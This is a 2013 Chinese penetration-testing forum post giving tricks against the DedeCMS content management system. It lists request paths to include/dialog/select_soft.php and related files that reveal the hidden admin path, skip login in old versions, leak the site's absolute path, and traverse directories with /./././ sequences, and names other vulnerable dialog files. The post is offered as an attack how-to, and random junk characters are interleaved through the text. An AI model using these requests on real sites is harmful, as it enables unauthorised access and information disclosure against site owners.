中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
  s: ^6 R* O% N& f* F+ n
: w! z) Y0 h4 A- a& b( \9 g! ?员帐号,新版本的就直接转向了后台.
( ]; i1 B+ b" x6 o" x5 b( X' P' H: u6 H( u/ {. t
2.include/dialog/config.php会爆出后台管理路径
( o$ T1 l# r, k7 a1 Z  D9 \2 `' E0 ~" v
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录& f/ h+ ~: C/ H( P* S9 w: G; I# \

" Z9 U2 p! o* {4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
3 c; q$ b6 N5 S3 }2 n  J  F1 O
$ t8 [; e7 P- X7 g5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
( h! t1 z( y% T0 E0 ^
& _- `' {6 S& b1 }2 |$ s到根目录去.不过这些版本的访问地址有些不同.
! t8 v# p0 l1 P地址为require/dialog/select_soft.php?activepath=/././././././././
+ w9 b! u0 A: F3 `( y& ?2 ]6 q* N4 `
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..) h! j% w3 D5 ~% T/ l
存在相同问题的文件还有
  O2 O9 B) P8 j$ ^include\dialog\select_images.php; b2 _! f; t  z
include\dialog\select_media.php
# P6 L3 j9 c4 O4 f( Y# G- uinclude\dialog\select_templets.php​) a3 P3 e& J$ F# ]- }( u




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2